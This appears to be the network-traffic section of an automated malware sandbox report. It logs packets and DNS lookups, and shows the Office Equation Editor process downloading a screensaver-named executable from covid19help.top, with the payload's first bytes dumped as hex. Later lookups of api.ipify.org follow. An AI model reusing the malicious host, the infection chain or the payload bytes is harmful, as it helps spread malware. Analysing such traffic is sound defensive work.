                                                        Apr 18, 2024 10:37:27.130021095 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.130834103 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.130871058 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.130897045 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.130904913 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.130917072 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.130944014 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.131731987 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.131781101 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.133100986 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.133150101 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.133167982 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.133173943 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.133196115 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.133213043 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.133213043 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.133994102 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.134052038 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.135726929 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.135775089 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.135788918 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.135796070 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.135819912 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.135829926 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.135859013 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.137528896 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.137588978 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.137597084 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.137613058 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.137640953 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.137660027 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.139316082 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.139352083 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.139372110 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.139379025 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.139389038 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.139414072 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.141062021 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.141118050 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.141119003 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.141132116 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.141174078 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.141184092 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.141223907 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.142421961 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.142479897 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.142486095 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.142498016 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.142538071 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.142549038 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.145037889 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.145093918 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.145107985 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.145116091 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.145128012 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.145138979 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.145158052 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.145174026 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.145179033 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.145210028 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.257683992 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.257821083 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.257824898 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.257849932 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.257915974 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.257930040 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.257968903 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.257989883 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.258044004 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.258102894 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.258150101 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.258285999 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.258507967 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.258575916 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.258624077 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.258666039 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.259444952 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.259510994 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.259579897 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.259643078 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.260339022 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.260401011 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.261666059 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.261754036 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.261790037 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.261841059 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.262099028 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.262161970 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.262974977 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.263035059 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.263102055 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.263150930 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.263878107 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.263947964 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.264553070 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.264602900 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.265558004 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.265584946 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.265608072 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.265616894 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.265633106 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.265646935 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.265659094 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.266459942 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.266515970 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.267791986 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.267821074 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.267853975 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.267859936 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.267870903 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.267889023 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.267941952 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.268630028 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.268687963 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.269479036 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.269531965 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.269537926 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.269556999 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.269577980 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.269614935 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.269666910 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.269680023 CEST44349163172.67.175.222192.168.2.22
                                                        Apr 18, 2024 10:37:27.269690990 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:27.269716978 CEST49163443192.168.2.22172.67.175.222
                                                        Apr 18, 2024 10:37:36.370981932 CEST49164443192.168.2.22104.26.12.205
                                                        Apr 18, 2024 10:37:36.371018887 CEST44349164104.26.12.205192.168.2.22
                                                        Apr 18, 2024 10:37:36.371068001 CEST49164443192.168.2.22104.26.12.205
                                                        Apr 18, 2024 10:37:36.396815062 CEST49164443192.168.2.22104.26.12.205
                                                        Apr 18, 2024 10:37:36.396843910 CEST44349164104.26.12.205192.168.2.22
                                                        Apr 18, 2024 10:37:36.620985985 CEST44349164104.26.12.205192.168.2.22
                                                        Apr 18, 2024 10:37:36.621274948 CEST49164443192.168.2.22104.26.12.205
                                                        Apr 18, 2024 10:37:36.687217951 CEST49164443192.168.2.22104.26.12.205
                                                        Apr 18, 2024 10:37:36.687230110 CEST44349164104.26.12.205192.168.2.22
                                                        Apr 18, 2024 10:37:36.688476086 CEST44349164104.26.12.205192.168.2.22
                                                        Apr 18, 2024 10:37:36.829674959 CEST49164443192.168.2.22104.26.12.205
                                                        Apr 18, 2024 10:37:36.876116037 CEST44349164104.26.12.205192.168.2.22
                                                        Apr 18, 2024 10:37:36.989707947 CEST44349164104.26.12.205192.168.2.22
                                                        Apr 18, 2024 10:37:36.989900112 CEST44349164104.26.12.205192.168.2.22
                                                        Apr 18, 2024 10:37:36.989960909 CEST49164443192.168.2.22104.26.12.205
                                                        Apr 18, 2024 10:37:37.005198956 CEST49164443192.168.2.22104.26.12.205
                                                        Apr 18, 2024 10:37:43.682346106 CEST49165443192.168.2.22104.26.13.205
                                                        Apr 18, 2024 10:37:43.682394028 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:43.682627916 CEST49165443192.168.2.22104.26.13.205
                                                        Apr 18, 2024 10:37:43.688004017 CEST49165443192.168.2.22104.26.13.205
                                                        Apr 18, 2024 10:37:43.688025951 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:43.909600019 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:43.909692049 CEST49165443192.168.2.22104.26.13.205
                                                        Apr 18, 2024 10:37:43.919262886 CEST49165443192.168.2.22104.26.13.205
                                                        Apr 18, 2024 10:37:43.919282913 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:43.919794083 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:44.124155998 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:44.124277115 CEST49165443192.168.2.22104.26.13.205
                                                        Apr 18, 2024 10:37:44.294563055 CEST49165443192.168.2.22104.26.13.205
                                                        Apr 18, 2024 10:37:44.336165905 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:44.457102060 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:44.457283974 CEST44349165104.26.13.205192.168.2.22
                                                        Apr 18, 2024 10:37:44.457438946 CEST49165443192.168.2.22104.26.13.205
                                                        Apr 18, 2024 10:37:44.460021973 CEST49165443192.168.2.22104.26.13.205

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 18, 2024 10:37:25.514779091 CEST5456253192.168.2.228.8.8.8
                                                        Apr 18, 2024 10:37:25.623182058 CEST53545628.8.8.8192.168.2.22
                                                        Apr 18, 2024 10:37:36.020222902 CEST5291753192.168.2.228.8.8.8
                                                        Apr 18, 2024 10:37:36.126555920 CEST53529178.8.8.8192.168.2.22
                                                        Apr 18, 2024 10:37:36.128086090 CEST5291753192.168.2.228.8.8.8
                                                        Apr 18, 2024 10:37:36.234421015 CEST53529178.8.8.8192.168.2.22
                                                        Apr 18, 2024 10:37:43.458601952 CEST6275153192.168.2.228.8.8.8
                                                        Apr 18, 2024 10:37:43.563364983 CEST53627518.8.8.8192.168.2.22
                                                        Apr 18, 2024 10:37:43.563774109 CEST6275153192.168.2.228.8.8.8
                                                        Apr 18, 2024 10:37:43.668469906 CEST53627518.8.8.8192.168.2.22

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Apr 18, 2024 10:37:25.514779091 CEST192.168.2.228.8.8.80x129Standard query (0)covid19help.topA (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:36.020222902 CEST192.168.2.228.8.8.80x423bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:36.128086090 CEST192.168.2.228.8.8.80x423bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:43.458601952 CEST192.168.2.228.8.8.80xec55Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:43.563774109 CEST192.168.2.228.8.8.80xec55Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Apr 18, 2024 10:37:25.623182058 CEST8.8.8.8192.168.2.220x129No error (0)covid19help.top172.67.175.222A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:25.623182058 CEST8.8.8.8192.168.2.220x129No error (0)covid19help.top104.21.83.128A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:36.126555920 CEST8.8.8.8192.168.2.220x423bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:36.126555920 CEST8.8.8.8192.168.2.220x423bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:36.126555920 CEST8.8.8.8192.168.2.220x423bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:36.234421015 CEST8.8.8.8192.168.2.220x423bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:36.234421015 CEST8.8.8.8192.168.2.220x423bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:36.234421015 CEST8.8.8.8192.168.2.220x423bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:43.563364983 CEST8.8.8.8192.168.2.220xec55No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:43.563364983 CEST8.8.8.8192.168.2.220xec55No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:43.563364983 CEST8.8.8.8192.168.2.220xec55No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:43.668469906 CEST8.8.8.8192.168.2.220xec55No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:43.668469906 CEST8.8.8.8192.168.2.220xec55No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 10:37:43.668469906 CEST8.8.8.8192.168.2.220xec55No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • covid19help.top
                                                        • api.ipify.org

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.2249163172.67.175.2224432152C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-18 08:37:25 UTC312OUTGET /xobizx.scr HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: covid19help.top
                                                        Connection: Keep-Alive
                                                        2024-04-18 08:37:26 UTC769INHTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 08:37:26 GMT
                                                        Content-Type: application/x-silverlight
                                                        Content-Length: 694792
                                                        Connection: close
                                                        Last-Modified: Wed, 17 Apr 2024 22:05:42 GMT
                                                        ETag: "a9a08-616520e3c0a91"
                                                        Accept-Ranges: bytes
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BxbfxI7eB8LUpghC5RRzcSJG16luG1mVFlKAJflrZG5RCTxtccwCkXs1pzJ5u3BwMZ1ap1iyYuIQ5bnprRCXwIKNX%2Bl%2F%2FzfbExlEuQksBMxS2H%2BIU3axr0xbmjjxH5BbpR8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 87635535dcc2070d-ATL
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-04-18 08:37:26 UTC600INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 44 20 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 40 0a 00 00 22 00 00 00 00 00 00 0e 5f 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELD f@"_ @ @
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 00 00 00 00 20 46 02 00 00 8d 01 00 00 01 25 d0 0e 00 00 04 28 01 00 00 0a 80 0f 00 00 04 20 f6 00 00 00 8d 05 00 00 01 25 d0 2f 00 00 04 28 01 00 00 0a 80 30 00 00 04 28 0a 00 00 06 2a d0 01 00 00 06 26 2a 00 00 00 66 02 28 03 00 00 0a 02 73 04 00 00 0a 7d 02 00 00 04 02 03 7d 01 00 00 04 2a 00 00 1b 30 03 00 cb 02 00 00 01 00 00 11 7e 30 00 00 04 13 0a 7e 0f 00 00 04 13 0b 03 6f 1f 00 00 06 7e 05 00 00 04 25 2d 17 26 7e 04 00 00 04 fe 06 0d 00 00 06 73 05 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 07 00 00 0a 0a 2b 00 16 13 09 11 09 45 08 00 00 00 00 00 00 00 64 00 00 00 33 00 00 00 64 00 00 00 6a 00 00 00 02 00 00 00 07 00 00 00 02 00 00 00 2b 00 38 b6 01 00 00 06 6f 08 00 00 0a 0b 73 09 00 00 0a 0c 04 6f 0a 00 00 0a 08 6f 0b 00 00 0a 26 11 0a 20 92
                                                        Data Ascii: F%( %/(0(*&*f(s}}*0~0~o~%-&~s%(+o+Ed3dj+8osoo&
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 00 70 1a 8d 07 00 00 01 25 16 03 6f 15 00 00 06 8c 08 00 00 1b a2 25 17 03 6f 11 00 00 06 a2 25 18 03 6f 17 00 00 06 0b 12 01 28 27 00 00 0a 2d 07 72 3f 00 00 70 2b 16 03 6f 17 00 00 06 0b 12 01 28 28 00 00 0a 0c 12 02 28 29 00 00 0a a2 25 19 03 6f 19 00 00 06 0b 12 01 28 27 00 00 0a 2d 07 72 3f 00 00 70 2b 16 03 6f 19 00 00 06 0b 12 01 28 28 00 00 0a 0c 12 02 28 29 00 00 0a a2 28 2a 00 00 0a 6f 11 00 00 0a 06 28 2b 00 00 0a 6f 2c 00 00 0a 2a 00 00 13 30 03 00 76 00 00 00 05 00 00 11 7e 30 00 00 04 0d 7e 0f 00 00 04 13 04 16 0c 08 45 06 00 00 00 00 00 00 00 3d 00 00 00 48 00 00 00 48 00 00 00 00 00 00 00 22 00 00 00 02 03 28 04 00 00 06 0a 06 2c 07 09 1f 14 91 0c 2b d0 11 04 20 2f 01 00 00 93 20 cf 35 00 00 59 2b ed 06 72 47 00 00 70 03 6f 15 00 00 06 8c
                                                        Data Ascii: p%o%o%o('-r?p+o((()%o('-r?p+o((()(*o(+o,*0v~0~E=HH"(,+ / 5Y+rGpo
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 00 04 2a 00 00 00 1e 02 7b 11 00 00 04 2a 22 02 03 7d 11 00 00 04 2a 00 00 00 1e 02 28 03 00 00 0a 2a 36 28 0a 00 00 06 2a d0 29 00 00 06 26 2a 00 00 13 30 07 00 28 00 00 00 00 00 00 00 20 bf 00 00 00 21 03 00 00 00 00 00 00 00 72 5f 00 00 70 03 1f 24 20 a0 9f 09 00 1f 3d 28 2b 00 00 06 74 32 00 00 01 2a 1b 30 06 00 ce 04 00 00 0a 00 00 11 7e 30 00 00 04 13 11 7e 0f 00 00 04 13 12 2b 5a 11 10 45 11 00 00 00 4d 01 00 00 20 01 00 00 74 00 00 00 a9 00 00 00 3f 01 00 00 9a 01 00 00 de 00 00 00 1c 00 00 00 76 00 00 00 0f 00 00 00 2c 00 00 00 00 00 00 00 a9 00 00 00 8c 01 00 00 f3 00 00 00 20 01 00 00 b5 01 00 00 d0 2b 00 00 06 26 11 11 1f 0a 91 13 10 2b a6 0e 05 16 3e 3b 04 00 00 1d 13 10 2b 99 20 e8 03 00 00 20 cc 03 00 00 28 77 00 00 06 0a 05 74 33 00 00 01
                                                        Data Ascii: *{*"}*(*6(*)&*0( !r_p$ =(+t2*0~0~+ZEM t?v, +&+>;+ (wt3
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 00 0b 00 00 11 7e 30 00 00 04 13 06 7e 0f 00 00 04 13 07 2b 3e 11 05 45 0b 00 00 00 0b 00 00 00 3e 00 00 00 7c 00 00 00 00 00 00 00 2c 00 00 00 12 00 00 00 12 00 00 00 2c 00 00 00 83 00 00 00 33 00 00 00 33 00 00 00 d0 2c 00 00 06 26 16 13 05 2b c2 16 0a 1b 13 05 2b bb 02 03 61 1f 7d 59 06 61 45 01 00 00 00 05 00 00 00 1d 13 05 2b a5 1f 0a 2b f8 14 0b 17 13 05 2b 9a 28 30 00 00 0a 0b 17 13 05 2b 8f 06 17 58 0a 20 c0 06 00 00 0c 20 3c 02 00 00 0d 20 60 03 00 00 08 18 5b 09 59 32 12 11 06 1f 7e 91 20 d8 00 00 00 59 13 05 38 61 ff ff ff 11 07 20 97 01 00 00 93 20 4d f7 00 00 59 2b e9 07 75 2b 00 00 01 2a 1b 13 05 38 42 ff ff ff 00 00 1e 02 7b 13 00 00 04 2a 22 02 03 7d 13 00 00 04 2a 00 00 00 1e 02 7b 14 00 00 04 2a 22 02 03 7d 14 00 00 04 2a 00 00 00 1e 02
                                                        Data Ascii: ~0~+>E>|,,33,&++a}YaE+++(0+X < `[Y2~ Y8a MY+u+*8B{*"}*{*"}*
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 00 00 50 00 00 00 00 00 00 00 d0 3b 00 00 06 26 11 04 20 69 01 00 00 93 20 7b 8f 00 00 59 0d 2b b3 16 0a 11 05 1f 56 91 0d 2b a9 03 04 61 1f 26 59 06 61 45 01 00 00 00 04 00 00 00 1c 0d 2b 94 1f 0a 2b f9 14 0b 11 04 20 72 01 00 00 93 20 c0 0c 00 00 59 0d 38 7a ff ff ff 02 8c 0b 00 00 1b 6f 4e 00 00 0a 0b 19 0d 38 67 ff ff ff 06 17 58 0a 03 25 5a 03 58 18 5d 2c 07 1d 0d 38 53 ff ff ff 11 04 20 d5 01 00 00 93 20 bc 3c 00 00 59 2b ea 16 0d 38 3c ff ff ff 07 74 32 00 00 01 2a 16 0d 38 2e ff ff ff 00 00 13 30 06 00 d9 00 00 00 0f 00 00 11 1f 09 13 05 11 05 45 0b 00 00 00 24 00 00 00 1e 00 00 00 84 00 00 00 a0 00 00 00 26 00 00 00 2b 00 00 00 75 00 00 00 2b 00 00 00 48 00 00 00 00 00 00 00 91 00 00 00 73 23 00 00 06 25 73 4f 00 00 0a 6f 22 00 00 06 25 73 50 00
                                                        Data Ascii: P;& i {Y+V+a&YaE++ r Y8zoN8gX%ZX],8S <Y+8<t2*8.0E$&+u+Hs#%sOo"%sP
                                                        2024-04-18 08:37:26 UTC1369INData Raw: 1a 59 06 61 45 01 00 00 00 05 00 00 00 1e 13 04 2b b7 11 05 1f 64 91 1f 57 59 2b f2 11 05 1f 14 91 13 04 2b a4 02 8c 0b 00 00 1b 03 04 05 6f 64 00 00 0a 06 17 58 0a 20 3a 08 00 00 0b 1f 6c 0c 20 be 02 00 00 07 19 5b 08 59 32 08 18 13 04 38 75 ff ff ff 17 2b f6 2a 1a 13 07 11 07 45 05 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 d0 47 00 00 06 26 2a 38 79 ff ff ff 00 13 30 04 00 e2 00 00 00 15 00 00 11 7e 30 00 00 04 13 05 7e 0f 00 00 04 13 06 2b 4c 11 04 45 0c 00 00 00 15 00 00 00 1c 00 00 00 37 00 00 00 66 00 00 00 4f 00 00 00 91 00 00 00 00 00 00 00 3a 00 00 00 66 00 00 00 7d 00 00 00 4f 00 00 00 93 00 00 00 d0 48 00 00 06 26 11 05 1f 26 91 20 e4 00 00 00 59 13 04 2b b4 16 0a 17 13 04 2b ad 0e 05 0e 04 61 1f 46 59 06 61 45 01 00
                                                        Data Ascii: YaE+dWY++odX :l [Y28u+*EG&*8y0~0~+LE7fO:f}OH&& Y++aFYaE
